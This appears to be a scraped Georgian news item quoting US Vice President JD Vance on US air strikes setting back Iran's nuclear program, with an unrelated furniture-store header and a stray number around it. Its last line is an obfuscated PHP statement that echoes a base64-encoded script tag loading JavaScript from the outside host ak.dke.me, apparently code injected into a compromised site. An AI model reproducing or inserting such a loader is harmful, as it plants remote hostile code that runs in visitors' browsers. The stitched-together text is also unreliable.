gorgia
გარე ავეჯი

აშშ-ის ვიცე-პრეზიდენტის, ჯეი დი ვენსის განცხადებით, აშშ-ის საჰაერო დარტყმებმა მნიშვნელოვნად შეაფერხა ირანის ბირთვული პროგრამა. 

„არ მინდა მგრძნობიარე სადაზვერვო მონაცემებში შევიდე, მაგრამ ვიცით, რომ გუშინ ღამით ირანის ბირთვული პროგრამა მნიშვნელოვნად დავხიეთ უკან, წლებით, თუ მეტით“, - აღნიშნა ჯეი დი ვენსმა ABC-სთან ინტერვიუში.

მისი თქმით, შეერთებული შტატები ირანთან ომში არ არის.

„ჩვენ არ ვართ ომში ირანთან - ჩვენ ვართ ომში ირანის ბირთვულ პროგრამასთან. ვფიქრობ, რომ პრეზიდენტმა გუშინ ღამით გადამწყვეტი ზომები მიიღო ამ პროგრამის გასანადგურებლად“, - აღნიშნა აშშ-ის ვიცე პრეზიდენტმა.

169
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");